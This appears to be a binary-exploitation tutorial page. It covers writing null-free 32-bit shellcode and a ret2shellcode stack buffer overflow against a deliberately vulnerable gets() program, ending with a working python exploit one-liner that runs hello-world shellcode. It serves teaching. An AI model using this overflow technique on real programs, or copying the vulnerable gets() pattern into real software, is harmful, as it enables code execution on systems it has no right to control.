ret2shellcode
Shellcode¶
1 2 3 4 5 6 7 8 | /* hello_world.c */ #include <stdio.h> int main(int argc, char *argv[]) { printf("HelloWorld !\n"); return 0; } |
The computer can't understand high level languages , it can only understand machine level language which is 1 and 0 , so we made a software which convert our human understandable language in to machine code , called the compiler .
1 | gcc hello_world.c -o hello_world |
When you compile the above code what the compiler does is that it translate the above logic into machine level instructions which can be directly executed by the computer.
Note
objdump is a tool used to view information about a ELF file .
1 2 3 | -D : option tells the tool to disassemble the binary information stored insde the executable and print it in assembly language -M : specifies which systax should the assembly should follow ( default is AT&T ) |
1 | objdump -D -M intel hello_world |
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 | ... ... 00000000000006b0 <main>: 6b0: 55 push rbp 6b1: 48 89 e5 mov rbp,rsp 6b4: 48 83 ec 10 sub rsp,0x10 6b8: 89 7d fc mov DWORD PTR [rbp-0x4],edi 6bb: 48 89 75 f0 mov QWORD PTR [rbp-0x10],rsi 6bf: 48 8d 3d 9e 00 00 00 lea rdi,[rip+0x9e] # 764 <_IO_stdin_used+0x4> 6c6: e8 95 fe ff ff call 560 <puts@plt> 6cb: b8 00 00 00 00 mov eax,0x0 6d0: c9 leave 6d1: c3 ret ... ... |
Even if you write code in Assembly language it can't be directly executed by the computer , it should be again translated into machine level instruction which only consist of 1 and 0 , As you see in the above code the first assembly instruction of our main is push rbp
which is the assembly representation of 0x55
or 1010101
, this is what our computer actually understand and executes .
When you execute this binary it will be copied to the memory , and the computer will execute it's instruction one by one by reading from the memory .
1 2 3 4 5 6 7 | ┌──────────┐ ┌──────────┐ ┌────────────┐ │ fetch │ ─> │ decode │ ─> │ execute │ └──────────┘ └──────────┘ └────────────┘ ^ ^ ^ │ │ │_ the operation is performed. │ │_ computer understands which operation is to be performed. │_ one instruction is fetched from the memory. |
What if we were able to inject own our code into the memory of a process and change it's control flow to execute that code . We can make the process do some weird stuffs . But we can't write that logic in C or in assembly and write that to memory . We should encode our assembly instruction to machine code and use that .
Hello World¶
Let's write Assembly code which prints "Hello world" .
Earlier we used the C library function called the printf to print the data into the screen , Which is not a valid possibility since we are programming in the assembly .
Syscall
The kernel of an Operating System is responsible of managing all the low level stuffs and it provides the programmers an interface to manipulate them , Syscalls call is a programmatic way in which the program requests a service from the Operating System's kernel . This may include accessing the hard disk , writing to the screen or reading from a file etc …
1 | $ strace ./hello_world |
1 2 3 4 5 6 7 8 9 10 11 12 13 | execve("./hello_world", ["./hello_world"], [/* 56 vars */]) = 0 brk(NULL) = 0x55f1ee7c5000 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory) mmap(NULL, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f5a2c5b4000 ... ... munmap(0x7f5a2c585000, 191761) = 0 fstat(1, {st_mode=S_IFCHR|0620, st_rdev=makedev(136, 0), ...}) = 0 brk(NULL) = 0x55f1ee7c5000 brk(0x55f1ee7e6000) = 0x55f1ee7e6000 write(1, "HelloWorld !\n", 13HelloWorld ! ) = 13 exit_group(0) = ? |
Note
strace
is a tools which can be used to display the syscalls used by a program .
As you can see, the compiled program does more than just print a string. The system calls at the start are setting up the environment and memory for the program, but the important part is the write() syscall . This is what actually outputs the string.
The Unix manual pages are separated into sections. Section 2 contains the manual pages for system calls, so man 2 write
will describe the use of the write() system call:
1 2 3 4 5 6 7 8 9 10 11 12 | WRITE(2) Linux Programmer's Manual WRITE(2) NAME write - write to a file descriptor SYNOPSIS #include <unistd.h> ssize_t write(int fd, const void *buf, size_t count); DESCRIPTION write() writes up to count bytes from the buffer pointed buf to the file referred to by the file descriptor fd. |
The strace output also shows the arguments for the syscall. The buf and count arguments are a pointer to our string and its length. The fd argument 1 is a special standard file descriptor. File descriptors are used for almost everything in Unix: input, output, file access, network sockets, and so on. A file descriptor is a indicator used to access a opened file or other input/output resource. The first three file descriptor numbers (0, 1, and 2) are automatically used for standard input, output, and error. so if you open a new file the unique number is used to refer that opened file and that number is called a file discriptor.
Writing bytes to standard output’s file descriptor of 1 will print the bytes; reading from standard input’s file descriptor of 0 will input bytes. The standard error file descriptor of 2 is used to display the error or debugging messages that can be filtered from the standard output.
In linux all the syscalls are referred with a predefined number and the arguments to the syscalls are placed on to the registers. How syscalls are called will be different for 32bit and 64 bit , So we will be focusing on 32 bit shellcode.
On 32 bit x86 Architecture a syscall is called by the int x80
instuction . it will call the syscall which corresponds to the number stored in the eax
register , and the arguments are passed through ebx
, ecx
, edx
registers .
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 | section .text ; Text segment global _start ; Default entry point for ELF linking _start: jmp gotoCall ; Jump to gotCall shellcode: ; SYSCALL: write(1,msg,14) mov eax, 4 ; Put 4 into eax, since write is syscall #4. mov ebx, 1 ; Put 1 into ebx, since stdout is 1. pop ecx ; Pop the Address of hello world from the stack mov edx, 14 ; Put 14 into edx, since our string is 14 bytes. int 0x80 ; Call the kernel to make the system call happen. ; SYSCALL: exit(0) mov eax, 1 ; Put 1 into eax, since exit is syscall #1. mov ebx, 0 ; Exit with success. int 0x80 ; Do the syscall. gotoCall: call shellcode ; Pushes the address of string to stack db "Hello, world!", 0x0a ; The string and newline char |
1 2 3 | $ nasm -f elf hello_world.asm $ ld -m elf_i386 hello_world.o $ ./a.out |
Note
nasm is a assembler , which converts the assembly program into machine understanding binary format. ld is used to create a executable from the output of the nasm tool.
The above assembly code prints "Hello, world!" and exits gracefully . We should avoid any code which produces absolute address since these shellcode will be injected to a running process and any reference it previously had will be invalid , So to get the address of the string hello world we will first jump the gotoCall
section and it contains a call instruction which will push the address of the next instruction to stack which will be the address of our string and jump to the shellcode section , now we can pop that address from the stack We can use objdump to extract the converted machine instructions.
1 | $ objdump -D -M intel a.out |
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 | ... ... 08048060 <_start>: 8048060: eb 1e jmp 8048080 <gotoCall> 08048062 <shellcode>: 8048062: b8 04 00 00 00 mov eax,0x4 8048067: bb 01 00 00 00 mov ebx,0x1 804806c: 59 pop ecx 804806d: ba 0e 00 00 00 mov edx,0xe 8048072: cd 80 int 0x80 8048074: b8 01 00 00 00 mov eax,0x1 8048079: bb 00 00 00 00 mov ebx,0x0 804807e: cd 80 int 0x80 08048080 <gotoCall>: 8048080: e8 dd ff ff ff call 8048062 <shellcode> 8048085: 48 dec eax ─ 8048086: 65 6c gs ins BYTE PTR es:[edi],dx │ 8048088: 6c ins BYTE PTR es:[edi],dx │ 8048089: 6f outs dx,DWORD PTR ds:[esi] │ "Hello, world!" 804808a: 2c 20 sub al,0x20 │ 804808c: 77 6f ja 80480fd <gotoCall╷0x7d> │ 804808e: 72 6c jb 80480fc <gotoCall╵0x7c> │ 8048090: 64 21 0a and DWORD PTR fs:[edx],ecx ─ ... ... |
The resultant shellcode is
1 | "\xeb\x1e\xb8\x04\x00\x00\x00\xbb\x01\x00\x00\x00\x59\xba\x0e\x00\x00\x00\xcd\x80\xb8\x01\x00\x00\x00\xbb\x00\x00\x00\x00\xcd\x80\xe8\xdd\xff\xff\xff\x48\x65\x6c\x6c\x6f\x2c\x20\x77\x6f\x72\x6c\x64\x21\x0a" |
You can use this code to debug the shellcode and test it
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 | /* shellcode.c */ #include<stdio.h> #include<string.h> unsigned char code[] = \ "\xeb\x1e\xb8\x04\x00\x00\x00\xbb\x01\x00\x00\x00\x59\xba\x0e" \ "\x00\x00\x00\xcd\x80\xb8\x01\x00\x00\x00\xbb\x00\x00\x00\x00" \ "\xcd\x80\xe8\xdd\xff\xff\xff\x48\x65\x6c\x6c\x6f\x2c\x20\x77" \ "\x6f\x72\x6c\x64\x21\x0a"; main() { printf("Shellcode Length: %d\n", strlen(code)); int (*ret)() = (int(*)())code; ret(); } |
1 | $ gcc -m32 -fno-stack-protector -z execstack -no-pie shellcode.c |
We have successfully created a shellcode , but the problem is NULL characters , in C a string is represented by a character array which ends with with a NULL character . This may cause problems with the shellcode when some string handling function manipulates this . So we will always try to make our shellcode NULL free.
Only way is to use assembly instruction which will not produce any NULL characters in them.
mov eax, 0x4
, here the move instruction uses a 32 bit register thus the encoding of this instruction also contains space to occupy this 32 bit value , since we have only given a constrain which only occupies one byte other 3 bytes will be NULL , One way to over come this is to move value to a lower register here al
1 | mov al,0x4 -> B0 04 |
Using lower register produced a null free code . When doing this we have to make sure to make the register value is zero other wise the previous value may corrupt our value
1 | xor eax,eax |
We can use xor instruction to make the register value null.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 | section .text ; Text segment global _start ; Default entry point for ELF linking _start: jmp gotoCall ; Jump to gotCall shellcode: ; SYSCALL: write(1,msg,14) xor eax,eax ; Null the registers xor ebx,ebx xor edx,edx ; Does not need to xor ecx since pop will overwrite any previos value mov al, 4 ; Put 4 into eax, since write is syscall #4. mov bl, 1 ; Put 1 into ebx, since stdout is 1. pop ecx ; Pop the Address of hello world from the stack mov dl, 14 ; Put 14 into edx, since our string is 14 bytes. int 0x80 ; Call the kernel to make the system call happen. ; SYSCALL: exit(0) mov al, 1 ; Put 1 into eax, since exit is syscall #1. xor ebx,ebx ; Exit with success. int 0x80 ; Do the syscall. gotoCall: call shellcode ; Pushes the address of string to stack db "Hello, world!", 0x0a ; The string and newline char |
Shellcode
"\xeb\x15\x31\xc0\x31\xdb\x31\xd2\xb0\x04\xb3\x01\x59\xb2\x0e\xcd\x80\xb0\x01\x31\xdb\xcd\x80\xe8\xe6\xff\xff\xff\x48\x65\x6c\x6c\x6f\x2c\x20\x77\x6f\x72\x6c\x64\x21\x0a"
Practice Problem
- Write a shellcode to open a file and a print it content
Use open syscall to open the file , then you can use read and write syscall.
- Shellcode to spawn a shell
man 2 execve
Reference:
ret2shellcode¶
Let's get into how we can use our previously created shellcode.
1 2 3 4 5 6 7 8 9 10 11 12 13 | /* ret2shellcode.c */ #include <stdio.h> #include <string.h> char buf[0x100]; int main() { char inp[0x100]={0}; gets(inp); strncpy(buf,inp,256); return 0; } |
Binary file : ret2shellcode
The code clearly has a buffer overflow bug which enables us to change the control flow of the program by overwriting the saved return address of main . Now the question is to find a suitable place to jump .
The main function reads a input from the user and that input is copied to a global variable called buf .
Let's look into the assembly of main
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 | $ pidof ret2shellcode 17255 $ cat /proc/17255/maps 08048000-08049000 r-xp 00000000 08:01 1516600 /tmp/ret2shellcode 08049000-0804a000 r-xp 00000000 08:01 1516600 /tmp/ret2shellcode 0804a000-0804b000 rwxp 00001000 08:01 1516600 /tmp/ret2shellcode 09d0f000-09d30000 rwxp 00000000 00:00 0 [heap] f754e000-f76ff000 r-xp 00000000 08:01 5115852 /lib/i386-linux-gnu/libc-2.24.so f76ff000-f7701000 r-xp 001b0000 08:01 5115852 /lib/i386-linux-gnu/libc-2.24.so f7701000-f7702000 rwxp 001b2000 08:01 5115852 /lib/i386-linux-gnu/libc-2.24.so f7702000-f7705000 rwxp 00000000 00:00 0 f7734000-f7737000 rwxp 00000000 00:00 0 f7737000-f7739000 r--p 00000000 00:00 0 [vvar] f7739000-f773b000 r-xp 00000000 00:00 0 [vdso] f773b000-f775e000 r-xp 00000000 08:01 5115848 /lib/i386-linux-gnu/ld-2.24.so f775e000-f775f000 r-xp 00022000 08:01 5115848 /lib/i386-linux-gnu/ld-2.24.so f775f000-f7760000 rwxp 00023000 08:01 5115848 /lib/i386-linux-gnu/ld-2.24.so ffdd5000-ffdf6000 rwxp 00000000 00:00 0 [stack] |
It is the memory mapping of our program , In linux all the details about a process is inside /proc/$PID/
directory and the maps file holds the detail of the processes memory mapping , the pidof
command returns the PID of the process.
If you notice the address of buf 0x804a040
lies between 0x0804a000-0x0804b000
address and the previous output shows us that that region has executable permission . ie , if we put some valid instruction at that address and change the execution flow to that address those instruction it will be executed.
1 | 0804a000-0804b000 rwxp 00001000 08:01 1516600 /tmp/ret2shellcode |
So , we can give our shellcode as an input and overflow the return address to jump to the address of buf , and our shellcode will be executed
Note
if the shellcode contains a null character , strncpy
function will only copy the input till that position other will be discarded , this will corrupt our shellcode copied into buf
.
So our payload will contain shellcode + junk + address of buf (overwrites return address)
.
If you use the shellcode we generated above it will cause problem since our hello world string ends with a new line , the gets
function stops reading when a new line is encountered thus rest of the payload will not be taken , we just need to change the last "\x0a" byte to a null byte .
Exploit
python -c 'print "\xeb\x15\x31\xc0\x31\xdb\x31\xd2\xb0\x04\xb3\x01\x59\xb2\x0e\xcd\x80\xb0\x01\x31\xdb\xcd\x80\xe8\xe6\xff\xff\xff\x48\x65\x6c\x6c\x6f\x2c\x20\x77\x6f\x72\x6c\x64\x21\x00" + "A" * 222 + "\x08\x04\xa0\x40"[::-1]' | ./ret2shellcode
1 | Hello, world! |
We have successfully executed the shellcode , you can debug the program with gdb to see the magic happening.